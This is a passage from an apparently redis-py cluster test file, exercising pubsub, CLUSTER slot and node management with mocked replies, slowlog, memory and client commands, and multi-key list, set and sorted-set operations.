p.psubscribe(pattern)
# Assert that each node returns that only one client is subscribed
sub_num_pat = node.redis_connection.pubsub_numpat()
if sub_num_pat == 0:
sleep(0.3)
sub_num_pat = node.redis_connection.pubsub_numpat()
assert sub_num_pat == 1
        # Assert that the cluster's pubsub_numpat function returns the total
        # number of pattern subscriptions across the entire cluster
assert r.pubsub_numpat(target_nodes="all") == len(nodes)
@skip_if_server_version_lt("2.8.0")
def test_cluster_pubsub_channels(self, r):
p = r.pubsub()
p.subscribe("foo", "bar", "baz", "quux")
for i in range(4):
assert wait_for_message(p, timeout=0.5)["type"] == "subscribe"
expected = [b"bar", b"baz", b"foo", b"quux"]
assert all(
[channel in r.pubsub_channels(target_nodes="all") for channel in expected]
)
@skip_if_server_version_lt("2.8.0")
def test_cluster_pubsub_numsub(self, r):
p1 = r.pubsub()
p1.subscribe("foo", "bar", "baz")
for i in range(3):
assert wait_for_message(p1, timeout=0.5)["type"] == "subscribe"
p2 = r.pubsub()
p2.subscribe("bar", "baz")
for i in range(2):
assert wait_for_message(p2, timeout=0.5)["type"] == "subscribe"
p3 = r.pubsub()
p3.subscribe("baz")
assert wait_for_message(p3, timeout=0.5)["type"] == "subscribe"
channels = [(b"foo", 1), (b"bar", 2), (b"baz", 3)]
assert r.pubsub_numsub("foo", "bar", "baz", target_nodes="all") == channels
@skip_if_redis_enterprise()
def test_cluster_myid(self, r):
node = r.get_random_node()
myid = r.cluster_myid(node)
assert len(myid) == 40
@skip_if_redis_enterprise()
def test_cluster_slots(self, r):
mock_all_nodes_resp(r, default_cluster_slots)
cluster_slots = r.cluster_slots()
assert isinstance(cluster_slots, dict)
assert len(default_cluster_slots) == len(cluster_slots)
assert cluster_slots.get((0, 8191)) is not None
assert cluster_slots.get((0, 8191)).get("primary") == ("127.0.0.1", 7000)
@skip_if_server_version_lt("7.0.0")
@skip_if_redis_enterprise()
def test_cluster_shards(self, r):
cluster_shards = r.cluster_shards()
assert isinstance(cluster_shards, list)
assert isinstance(cluster_shards[0], dict)
attributes = [
"id",
"endpoint",
"ip",
"hostname",
"port",
"tls-port",
"role",
"replication-offset",
"health",
]
for x in cluster_shards:
assert list(x.keys()) == ["slots", "nodes"]
for node in x["nodes"]:
for attribute in node.keys():
assert attribute in attributes
@skip_if_redis_enterprise()
def test_cluster_addslots(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
assert r.cluster_addslots(node, 1, 2, 3) is True
@skip_if_server_version_lt("7.0.0")
@skip_if_redis_enterprise()
def test_cluster_addslotsrange(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
assert r.cluster_addslotsrange(node, 1, 5)
@skip_if_redis_enterprise()
def test_cluster_countkeysinslot(self, r):
node = r.nodes_manager.get_node_from_slot(1)
mock_node_resp(node, 2)
assert r.cluster_countkeysinslot(1) == 2
def test_cluster_count_failure_report(self, r):
mock_all_nodes_resp(r, 0)
assert r.cluster_count_failure_report("node_0") == 0
@skip_if_redis_enterprise()
def test_cluster_delslots(self):
cluster_slots = [
[
0,
8191,
["127.0.0.1", 7000, "node_0"],
],
[
8192,
16383,
["127.0.0.1", 7001, "node_1"],
],
]
r = get_mocked_redis_client(
host=default_host, port=default_port, cluster_slots=cluster_slots
)
mock_all_nodes_resp(r, "OK")
node0 = r.get_node(default_host, 7000)
node1 = r.get_node(default_host, 7001)
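        # cluster_delslots issues one CLUSTER DELSLOTS per requested slot,
        # each routed to that slot's owner, hence one boolean per slot.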
assert r.cluster_delslots(0, 8192) == [True, True]
assert node0.redis_connection.connection.read_response.called
assert node1.redis_connection.connection.read_response.called
@skip_if_server_version_lt("7.0.0")
@skip_if_redis_enterprise()
def test_cluster_delslotsrange(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
r.cluster_addslots(node, 1, 2, 3, 4, 5)
assert r.cluster_delslotsrange(1, 5)
@skip_if_redis_enterprise()
def test_cluster_failover(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
assert r.cluster_failover(node) is True
assert r.cluster_failover(node, "FORCE") is True
assert r.cluster_failover(node, "TAKEOVER") is True
        with pytest.raises(RedisError):
            r.cluster_failover(node, "FORCT")  # deliberately invalid option
@skip_if_redis_enterprise()
def test_cluster_info(self, r):
info = r.cluster_info()
assert isinstance(info, dict)
assert info["cluster_state"] == "ok"
@skip_if_redis_enterprise()
def test_cluster_keyslot(self, r):
mock_all_nodes_resp(r, 12182)
assert r.cluster_keyslot("foo") == 12182
@skip_if_redis_enterprise()
def test_cluster_meet(self, r):
node = r.get_default_node()
mock_node_resp(node, "OK")
assert r.cluster_meet("127.0.0.1", 6379) is True
@skip_if_redis_enterprise()
def test_cluster_nodes(self, r):
response = (
"c8253bae761cb1ecb2b61857d85dfe455a0fec8b 172.17.0.7:7006 "
"slave aa90da731f673a99617dfe930306549a09f83a6b 0 "
"1447836263059 5 connected\n"
"9bd595fe4821a0e8d6b99d70faa660638a7612b3 172.17.0.7:7008 "
"master - 0 1447836264065 0 connected\n"
"aa90da731f673a99617dfe930306549a09f83a6b 172.17.0.7:7003 "
"myself,master - 0 0 2 connected 5461-10922\n"
"1df047e5a594f945d82fc140be97a1452bcbf93e 172.17.0.7:7007 "
"slave 19efe5a631f3296fdf21a5441680f893e8cc96ec 0 "
"1447836262556 3 connected\n"
"4ad9a12e63e8f0207025eeba2354bcf4c85e5b22 172.17.0.7:7005 "
"master - 0 1447836262555 7 connected 0-5460\n"
"19efe5a631f3296fdf21a5441680f893e8cc96ec 172.17.0.7:7004 "
"master - 0 1447836263562 3 connected 10923-16383\n"
"fbb23ed8cfa23f17eaf27ff7d0c410492a1093d6 172.17.0.7:7002 "
"master,fail - 1447829446956 1447829444948 1 disconnected\n"
)
mock_all_nodes_resp(r, response)
nodes = r.cluster_nodes()
assert len(nodes) == 7
assert nodes.get("172.17.0.7:7006") is not None
assert (
nodes.get("172.17.0.7:7006").get("node_id")
== "c8253bae761cb1ecb2b61857d85dfe455a0fec8b"
)
@skip_if_redis_enterprise()
def test_cluster_nodes_importing_migrating(self, r):
response = (
"488ead2fcce24d8c0f158f9172cb1f4a9e040fe5 127.0.0.1:16381@26381 "
"master - 0 1648975557664 3 connected 10923-16383\n"
"8ae2e70812db80776f739a72374e57fc4ae6f89d 127.0.0.1:16380@26380 "
"master - 0 1648975555000 2 connected 1 5461-10922 ["
"2-<-ed8007ccfa2d91a7b76f8e6fba7ba7e257034a16]\n"
"ed8007ccfa2d91a7b76f8e6fba7ba7e257034a16 127.0.0.1:16379@26379 "
"myself,master - 0 1648975556000 1 connected 0 2-5460 ["
"2->-8ae2e70812db80776f739a72374e57fc4ae6f89d]\n"
)
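        # The bracketed suffixes use CLUSTER NODES syntax:
        # [<slot>-<-<node-id>] marks an importing slot and
        # [<slot>->-<node-id>] a migrating one.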
mock_all_nodes_resp(r, response)
nodes = r.cluster_nodes()
assert len(nodes) == 3
node_16379 = nodes.get("127.0.0.1:16379")
node_16380 = nodes.get("127.0.0.1:16380")
node_16381 = nodes.get("127.0.0.1:16381")
assert node_16379.get("migrations") == [
{
"slot": "2",
"node_id": "8ae2e70812db80776f739a72374e57fc4ae6f89d",
"state": "migrating",
}
]
assert node_16379.get("slots") == [["0"], ["2", "5460"]]
assert node_16380.get("migrations") == [
{
"slot": "2",
"node_id": "ed8007ccfa2d91a7b76f8e6fba7ba7e257034a16",
"state": "importing",
}
]
assert node_16380.get("slots") == [["1"], ["5461", "10922"]]
assert node_16381.get("slots") == [["10923", "16383"]]
assert node_16381.get("migrations") == []
@skip_if_redis_enterprise()
def test_cluster_replicate(self, r):
node = r.get_random_node()
all_replicas = r.get_replicas()
mock_all_nodes_resp(r, "OK")
assert r.cluster_replicate(node, "c8253bae761cb61857d") is True
results = r.cluster_replicate(all_replicas, "c8253bae761cb61857d")
if isinstance(results, dict):
for res in results.values():
assert res is True
else:
assert results is True
@skip_if_redis_enterprise()
def test_cluster_reset(self, r):
mock_all_nodes_resp(r, "OK")
assert r.cluster_reset() is True
assert r.cluster_reset(False) is True
all_results = r.cluster_reset(False, target_nodes="all")
for res in all_results.values():
assert res is True
@skip_if_redis_enterprise()
def test_cluster_save_config(self, r):
node = r.get_random_node()
all_nodes = r.get_nodes()
mock_all_nodes_resp(r, "OK")
assert r.cluster_save_config(node) is True
all_results = r.cluster_save_config(all_nodes)
for res in all_results.values():
assert res is True
@skip_if_redis_enterprise()
def test_cluster_get_keys_in_slot(self, r):
response = ["{foo}1", "{foo}2"]
node = r.nodes_manager.get_node_from_slot(12182)
mock_node_resp(node, response)
keys = r.cluster_get_keys_in_slot(12182, 4)
assert keys == response
@skip_if_redis_enterprise()
def test_cluster_set_config_epoch(self, r):
mock_all_nodes_resp(r, "OK")
assert r.cluster_set_config_epoch(3) is True
all_results = r.cluster_set_config_epoch(3, target_nodes="all")
for res in all_results.values():
assert res is True
@skip_if_redis_enterprise()
def test_cluster_setslot(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
assert r.cluster_setslot(node, "node_0", 1218, "IMPORTING") is True
assert r.cluster_setslot(node, "node_0", 1218, "NODE") is True
assert r.cluster_setslot(node, "node_0", 1218, "MIGRATING") is True
        with pytest.raises(RedisError):
            r.cluster_setslot(node, "node_0", 1218, "STABLE")
        with pytest.raises(RedisError):
            r.cluster_setslot(node, "node_0", 1218, "STATE")
def test_cluster_setslot_stable(self, r):
node = r.nodes_manager.get_node_from_slot(12182)
mock_node_resp(node, "OK")
assert r.cluster_setslot_stable(12182) is True
assert node.redis_connection.connection.read_response.called
@skip_if_redis_enterprise()
def test_cluster_replicas(self, r):
response = [
b"01eca22229cf3c652b6fca0d09ff6941e0d2e3 "
b"127.0.0.1:6377@16377 slave "
b"52611e796814b78e90ad94be9d769a4f668f9a 0 "
b"1634550063436 4 connected",
b"r4xfga22229cf3c652b6fca0d09ff69f3e0d4d "
b"127.0.0.1:6378@16378 slave "
b"52611e796814b78e90ad94be9d769a4f668f9a 0 "
b"1634550063436 4 connected",
]
mock_all_nodes_resp(r, response)
replicas = r.cluster_replicas("52611e796814b78e90ad94be9d769a4f668f9a")
assert replicas.get("127.0.0.1:6377") is not None
assert replicas.get("127.0.0.1:6378") is not None
assert (
replicas.get("127.0.0.1:6378").get("node_id")
== "r4xfga22229cf3c652b6fca0d09ff69f3e0d4d"
)
@skip_if_server_version_lt("7.0.0")
def test_cluster_links(self, r):
node = r.get_random_node()
res = r.cluster_links(node)
links_to = sum(x.count("to") for x in res)
links_for = sum(x.count("from") for x in res)
assert links_to == links_for
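        # Links are reported in to/from pairs, so consecutive entries should
        # describe the same peer; the pairwise field check below relies on it.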
for i in range(0, len(res) - 1, 2):
assert res[i][3] == res[i + 1][3]
@skip_if_redis_enterprise()
def test_readonly(self):
r = get_mocked_redis_client(host=default_host, port=default_port)
mock_all_nodes_resp(r, "OK")
assert r.readonly() is True
all_replicas_results = r.readonly(target_nodes="replicas")
for res in all_replicas_results.values():
assert res is True
for replica in r.get_replicas():
assert replica.redis_connection.connection.read_response.called
@skip_if_redis_enterprise()
def test_readwrite(self):
r = get_mocked_redis_client(host=default_host, port=default_port)
mock_all_nodes_resp(r, "OK")
assert r.readwrite() is True
all_replicas_results = r.readwrite(target_nodes="replicas")
for res in all_replicas_results.values():
assert res is True
for replica in r.get_replicas():
assert replica.redis_connection.connection.read_response.called
@skip_if_redis_enterprise()
def test_bgsave(self, r):
assert r.bgsave()
sleep(0.3)
assert r.bgsave(True)
def test_info(self, r):
# Map keys to same slot
r.set("x{1}", 1)
r.set("y{1}", 2)
r.set("z{1}", 3)
# Get node that handles the slot
slot = r.keyslot("x{1}")
node = r.nodes_manager.get_node_from_slot(slot)
# Run info on that node
info = r.info(target_nodes=node)
assert isinstance(info, dict)
assert info["db0"]["keys"] == 3
def _init_slowlog_test(self, r, node):
slowlog_lim = r.config_get("slowlog-log-slower-than", target_nodes=node)
assert r.config_set("slowlog-log-slower-than", 0, target_nodes=node) is True
return slowlog_lim["slowlog-log-slower-than"]
def _teardown_slowlog_test(self, r, node, prev_limit):
assert (
r.config_set("slowlog-log-slower-than", prev_limit, target_nodes=node)
is True
)
def test_slowlog_get(self, r, slowlog):
unicode_string = chr(3456) + "abcd" + chr(3421)
node = r.get_node_from_key(unicode_string)
slowlog_limit = self._init_slowlog_test(r, node)
assert r.slowlog_reset(target_nodes=node)
r.get(unicode_string)
slowlog = r.slowlog_get(target_nodes=node)
assert isinstance(slowlog, list)
commands = [log["command"] for log in slowlog]
get_command = b" ".join((b"GET", unicode_string.encode("utf-8")))
assert get_command in commands
assert b"SLOWLOG RESET" in commands
# the order should be ['GET <uni string>', 'SLOWLOG RESET'],
# but if other clients are executing commands at the same time, there
# could be commands, before, between, or after, so just check that
# the two we care about are in the appropriate order.
assert commands.index(get_command) < commands.index(b"SLOWLOG RESET")
# make sure other attributes are typed correctly
assert isinstance(slowlog[0]["start_time"], int)
assert isinstance(slowlog[0]["duration"], int)
# rollback the slowlog limit to its original value
self._teardown_slowlog_test(r, node, slowlog_limit)
def test_slowlog_get_limit(self, r, slowlog):
assert r.slowlog_reset()
node = r.get_node_from_key("foo")
slowlog_limit = self._init_slowlog_test(r, node)
r.get("foo")
slowlog = r.slowlog_get(1, target_nodes=node)
assert isinstance(slowlog, list)
# only one command, based on the number we passed to slowlog_get()
assert len(slowlog) == 1
self._teardown_slowlog_test(r, node, slowlog_limit)
def test_slowlog_length(self, r, slowlog):
r.get("foo")
node = r.nodes_manager.get_node_from_slot(key_slot(b"foo"))
slowlog_len = r.slowlog_len(target_nodes=node)
assert isinstance(slowlog_len, int)
def test_time(self, r):
t = r.time(target_nodes=r.get_primaries()[0])
assert len(t) == 2
assert isinstance(t[0], int)
assert isinstance(t[1], int)
@skip_if_server_version_lt("4.0.0")
def test_memory_usage(self, r):
r.set("foo", "bar")
assert isinstance(r.memory_usage("foo"), int)
@skip_if_server_version_lt("4.0.0")
@skip_if_redis_enterprise()
def test_memory_malloc_stats(self, r):
assert r.memory_malloc_stats()
@skip_if_server_version_lt("4.0.0")
@skip_if_redis_enterprise()
def test_memory_stats(self, r):
# put a key into the current db to make sure that "db.<current-db>"
# has data
r.set("foo", "bar")
node = r.nodes_manager.get_node_from_slot(key_slot(b"foo"))
stats = r.memory_stats(target_nodes=node)
assert isinstance(stats, dict)
for key, value in stats.items():
if key.startswith("db."):
assert isinstance(value, dict)
@skip_if_server_version_lt("4.0.0")
def test_memory_help(self, r):
with pytest.raises(NotImplementedError):
r.memory_help()
@skip_if_server_version_lt("4.0.0")
def test_memory_doctor(self, r):
with pytest.raises(NotImplementedError):
r.memory_doctor()
@skip_if_redis_enterprise()
def test_lastsave(self, r):
node = r.get_primaries()[0]
assert isinstance(r.lastsave(target_nodes=node), datetime.datetime)
def test_cluster_echo(self, r):
node = r.get_primaries()[0]
assert r.echo("foo bar", target_nodes=node) == b"foo bar"
@skip_if_server_version_lt("1.0.0")
def test_debug_segfault(self, r):
with pytest.raises(NotImplementedError):
r.debug_segfault()
def test_config_resetstat(self, r):
node = r.get_primaries()[0]
r.ping(target_nodes=node)
prior_commands_processed = int(
r.info(target_nodes=node)["total_commands_processed"]
)
assert prior_commands_processed >= 1
r.config_resetstat(target_nodes=node)
reset_commands_processed = int(
r.info(target_nodes=node)["total_commands_processed"]
)
assert reset_commands_processed < prior_commands_processed
@skip_if_server_version_lt("6.2.0")
def test_client_trackinginfo(self, r):
node = r.get_primaries()[0]
res = r.client_trackinginfo(target_nodes=node)
assert len(res) > 2
assert "prefixes" in res
@skip_if_server_version_lt("2.9.50")
def test_client_pause(self, r):
node = r.get_primaries()[0]
assert r.client_pause(1, target_nodes=node)
assert r.client_pause(timeout=1, target_nodes=node)
with pytest.raises(RedisError):
r.client_pause(timeout="not an integer", target_nodes=node)
@skip_if_server_version_lt("6.2.0")
@skip_if_redis_enterprise()
def test_client_unpause(self, r):
assert r.client_unpause()
@skip_if_server_version_lt("5.0.0")
def test_client_id(self, r):
node = r.get_primaries()[0]
assert r.client_id(target_nodes=node) > 0
@skip_if_server_version_lt("5.0.0")
def test_client_unblock(self, r):
node = r.get_primaries()[0]
myid = r.client_id(target_nodes=node)
assert not r.client_unblock(myid, target_nodes=node)
assert not r.client_unblock(myid, error=True, target_nodes=node)
assert not r.client_unblock(myid, error=False, target_nodes=node)
@skip_if_server_version_lt("6.0.0")
def test_client_getredir(self, r):
node = r.get_primaries()[0]
assert isinstance(r.client_getredir(target_nodes=node), int)
assert r.client_getredir(target_nodes=node) == -1
@skip_if_server_version_lt("6.2.0")
def test_client_info(self, r):
node = r.get_primaries()[0]
info = r.client_info(target_nodes=node)
assert isinstance(info, dict)
assert "addr" in info
@skip_if_server_version_lt("2.6.9")
def test_client_kill(self, r, r2):
node = r.get_primaries()[0]
r.client_setname("redis-py-c1", target_nodes="all")
r2.client_setname("redis-py-c2", target_nodes="all")
clients = [
client
for client in r.client_list(target_nodes=node)
if client.get("name") in ["redis-py-c1", "redis-py-c2"]
]
assert len(clients) == 2
clients_by_name = {client.get("name"): client for client in clients}
client_addr = clients_by_name["redis-py-c2"].get("addr")
assert r.client_kill(client_addr, target_nodes=node) is True
clients = [
client
for client in r.client_list(target_nodes=node)
if client.get("name") in ["redis-py-c1", "redis-py-c2"]
]
assert len(clients) == 1
assert clients[0].get("name") == "redis-py-c1"
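    # The "{...}" hash tags in the tests below force every key of a multi-key
    # command into the same slot, which RedisCluster requires for cross-key
    # operations.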
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_not_empty_string(self, r):
r["{foo}a"] = ""
r.bitop("not", "{foo}r", "{foo}a")
assert r.get("{foo}r") is None
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_not(self, r):
test_str = b"\xAA\x00\xFF\x55"
correct = ~0xAA00FF55 & 0xFFFFFFFF
r["{foo}a"] = test_str
r.bitop("not", "{foo}r", "{foo}a")
assert int(binascii.hexlify(r["{foo}r"]), 16) == correct
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_not_in_place(self, r):
test_str = b"\xAA\x00\xFF\x55"
correct = ~0xAA00FF55 & 0xFFFFFFFF
r["{foo}a"] = test_str
r.bitop("not", "{foo}a", "{foo}a")
assert int(binascii.hexlify(r["{foo}a"]), 16) == correct
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_single_string(self, r):
test_str = b"\x01\x02\xFF"
r["{foo}a"] = test_str
r.bitop("and", "{foo}res1", "{foo}a")
r.bitop("or", "{foo}res2", "{foo}a")
r.bitop("xor", "{foo}res3", "{foo}a")
assert r["{foo}res1"] == test_str
assert r["{foo}res2"] == test_str
assert r["{foo}res3"] == test_str
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_string_operands(self, r):
r["{foo}a"] = b"\x01\x02\xFF\xFF"
r["{foo}b"] = b"\x01\x02\xFF"
r.bitop("and", "{foo}res1", "{foo}a", "{foo}b")
r.bitop("or", "{foo}res2", "{foo}a", "{foo}b")
r.bitop("xor", "{foo}res3", "{foo}a", "{foo}b")
assert int(binascii.hexlify(r["{foo}res1"]), 16) == 0x0102FF00
assert int(binascii.hexlify(r["{foo}res2"]), 16) == 0x0102FFFF
assert int(binascii.hexlify(r["{foo}res3"]), 16) == 0x000000FF
@skip_if_server_version_lt("6.2.0")
def test_cluster_copy(self, r):
assert r.copy("{foo}a", "{foo}b") == 0
r.set("{foo}a", "bar")
assert r.copy("{foo}a", "{foo}b") == 1
assert r.get("{foo}a") == b"bar"
assert r.get("{foo}b") == b"bar"
@skip_if_server_version_lt("6.2.0")
def test_cluster_copy_and_replace(self, r):
r.set("{foo}a", "foo1")
r.set("{foo}b", "foo2")
assert r.copy("{foo}a", "{foo}b") == 0
assert r.copy("{foo}a", "{foo}b", replace=True) == 1
@skip_if_server_version_lt("6.2.0")
def test_cluster_lmove(self, r):
r.rpush("{foo}a", "one", "two", "three", "four")
assert r.lmove("{foo}a", "{foo}b")
assert r.lmove("{foo}a", "{foo}b", "right", "left")
@skip_if_server_version_lt("6.2.0")
def test_cluster_blmove(self, r):
r.rpush("{foo}a", "one", "two", "three", "four")
assert r.blmove("{foo}a", "{foo}b", 5)
assert r.blmove("{foo}a", "{foo}b", 1, "RIGHT", "LEFT")
def test_cluster_msetnx(self, r):
d = {"{foo}a": b"1", "{foo}b": b"2", "{foo}c": b"3"}
assert r.msetnx(d)
d2 = {"{foo}a": b"x", "{foo}d": b"4"}
assert not r.msetnx(d2)
for k, v in d.items():
assert r[k] == v
assert r.get("{foo}d") is None
def test_cluster_rename(self, r):
r["{foo}a"] = "1"
assert r.rename("{foo}a", "{foo}b")
assert r.get("{foo}a") is None
assert r["{foo}b"] == b"1"
def test_cluster_renamenx(self, r):
r["{foo}a"] = "1"
r["{foo}b"] = "2"
assert not r.renamenx("{foo}a", "{foo}b")
assert r["{foo}a"] == b"1"
assert r["{foo}b"] == b"2"
# LIST COMMANDS
def test_cluster_blpop(self, r):
r.rpush("{foo}a", "1", "2")
r.rpush("{foo}b", "3", "4")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"3")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"4")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"1")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"2")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) is None
r.rpush("{foo}c", "1")
assert r.blpop("{foo}c", timeout=1) == (b"{foo}c", b"1")
def test_cluster_brpop(self, r):
r.rpush("{foo}a", "1", "2")
r.rpush("{foo}b", "3", "4")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"4")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"3")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"2")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"1")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) is None
r.rpush("{foo}c", "1")
assert r.brpop("{foo}c", timeout=1) == (b"{foo}c", b"1")
def test_cluster_brpoplpush(self, r):
r.rpush("{foo}a", "1", "2")
r.rpush("{foo}b", "3", "4")
assert r.brpoplpush("{foo}a", "{foo}b") == b"2"
assert r.brpoplpush("{foo}a", "{foo}b") == b"1"
assert r.brpoplpush("{foo}a", "{foo}b", timeout=1) is None
assert r.lrange("{foo}a", 0, -1) == []
assert r.lrange("{foo}b", 0, -1) == [b"1", b"2", b"3", b"4"]
def test_cluster_brpoplpush_empty_string(self, r):
r.rpush("{foo}a", "")
assert r.brpoplpush("{foo}a", "{foo}b") == b""
def test_cluster_rpoplpush(self, r):
r.rpush("{foo}a", "a1", "a2", "a3")
r.rpush("{foo}b", "b1", "b2", "b3")
assert r.rpoplpush("{foo}a", "{foo}b") == b"a3"
assert r.lrange("{foo}a", 0, -1) == [b"a1", b"a2"]
assert r.lrange("{foo}b", 0, -1) == [b"a3", b"b1", b"b2", b"b3"]
def test_cluster_sdiff(self, r):
r.sadd("{foo}a", "1", "2", "3")
assert r.sdiff("{foo}a", "{foo}b") == {b"1", b"2", b"3"}
r.sadd("{foo}b", "2", "3")
assert r.sdiff("{foo}a", "{foo}b") == {b"1"}
def test_cluster_sdiffstore(self, r):
r.sadd("{foo}a", "1", "2", "3")
assert r.sdiffstore("{foo}c", "{foo}a", "{foo}b") == 3
assert r.smembers("{foo}c") == {b"1", b"2", b"3"}
r.sadd("{foo}b", "2", "3")
assert r.sdiffstore("{foo}c", "{foo}a", "{foo}b") == 1
assert r.smembers("{foo}c") == {b"1"}
def test_cluster_sinter(self, r):
r.sadd("{foo}a", "1", "2", "3")
assert r.sinter("{foo}a", "{foo}b") == set()
r.sadd("{foo}b", "2", "3")
assert r.sinter("{foo}a", "{foo}b") == {b"2", b"3"}
def test_cluster_sinterstore(self, r):
r.sadd("{foo}a", "1", "2", "3")
assert r.sinterstore("{foo}c", "{foo}a", "{foo}b") == 0
assert r.smembers("{foo}c") == set()
r.sadd("{foo}b", "2", "3")
assert r.sinterstore("{foo}c", "{foo}a", "{foo}b") == 2
assert r.smembers("{foo}c") == {b"2", b"3"}
def test_cluster_smove(self, r):
r.sadd("{foo}a", "a1", "a2")
r.sadd("{foo}b", "b1", "b2")
assert r.smove("{foo}a", "{foo}b", "a1")
assert r.smembers("{foo}a") == {b"a2"}
assert r.smembers("{foo}b") == {b"b1", b"b2", b"a1"}
def test_cluster_sunion(self, r):
r.sadd("{foo}a", "1", "2")
r.sadd("{foo}b", "2", "3")
assert r.sunion("{foo}a", "{foo}b") == {b"1", b"2", b"3"}
def test_cluster_sunionstore(self, r):
r.sadd("{foo}a", "1", "2")
r.sadd("{foo}b", "2", "3")
assert r.sunionstore("{foo}c", "{foo}a", "{foo}b") == 3
assert r.smembers("{foo}c") == {b"1", b"2", b"3"}
@skip_if_server_version_lt("6.2.0")
def test_cluster_zdiff(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
r.zadd("{foo}b", {"a1": 1, "a2": 2})
assert r.zdiff(["{foo}a", "{foo}b"]) == [b"a3"]
assert r.zdiff(["{foo}a", "{foo}b"], withscores=True) == [b"a3", b"3"]
@skip_if_server_version_lt("6.2.0")
def test_cluster_zdiffstore(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
r.zadd("{foo}b", {"a1": 1, "a2": 2})
assert r.zdiffstore("{foo}out", ["{foo}a", "{foo}b"])
assert r.zrange("{foo}out", 0, -1) == [b"a3"]
assert r.zrange("{foo}out", 0, -1, withscores=True) == [(b"a3", 3.0)]
@skip_if_server_version_lt("6.2.0")
def test_cluster_zinter(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zinter(["{foo}a", "{foo}b", "{foo}c"]) == [b"a3", b"a1"]
# invalid aggregation
with pytest.raises(DataError):
r.zinter(["{foo}a", "{foo}b", "{foo}c"], aggregate="foo", withscores=True)
# aggregate with SUM
assert r.zinter(["{foo}a", "{foo}b", "{foo}c"], withscores=True) == [
(b"a3", 8),
(b"a1", 9),
]
# aggregate with MAX
assert r.zinter(
["{foo}a", "{foo}b", "{foo}c"], aggregate="MAX", withscores=True
) == [(b"a3", 5), (b"a1", 6)]
# aggregate with MIN
assert r.zinter(
["{foo}a", "{foo}b", "{foo}c"], aggregate="MIN", withscores=True
) == [(b"a1", 1), (b"a3", 1)]
# with weights
assert r.zinter({"{foo}a": 1, "{foo}b": 2, "{foo}c": 3}, withscores=True) == [
(b"a3", 20),
(b"a1", 23),
]
def test_cluster_zinterstore_sum(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zinterstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"]) == 2
assert r.zrange("{foo}d", 0, -1, withscores=True) == [(b"a3", 8), (b"a1", 9)]
def test_cluster_zinterstore_max(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert (
r.zinterstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"], aggregate="MAX")
== 2
)
assert r.zrange("{foo}d", 0, -1, withscores=True) == [(b"a3", 5), (b"a1", 6)]
def test_cluster_zinterstore_min(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
r.zadd("{foo}b", {"a1": 2, "a2": 3, "a3": 5})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert (
r.zinterstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"], aggregate="MIN")
== 2
)
assert r.zrange("{foo}d", 0, -1, withscores=True) == [(b"a1", 1), (b"a3", 3)]
def test_cluster_zinterstore_with_weight(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zinterstore("{foo}d", {"{foo}a": 1, "{foo}b": 2, "{foo}c": 3}) == 2
assert r.zrange("{foo}d", 0, -1, withscores=True) == [(b"a3", 20), (b"a1", 23)]
@skip_if_server_version_lt("4.9.0")
def test_cluster_bzpopmax(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2})
r.zadd("{foo}b", {"b1": 10, "b2": 20})
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"b2", 20)
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"b1", 10)
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"a2", 2)
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"a1", 1)
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) is None
r.zadd("{foo}c", {"c1": 100})
assert r.bzpopmax("{foo}c", timeout=1) == (b"{foo}c", b"c1", 100)
@skip_if_server_version_lt("4.9.0")
def test_cluster_bzpopmin(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2})
r.zadd("{foo}b", {"b1": 10, "b2": 20})
assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"b1", 10)
assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"b2", 20)
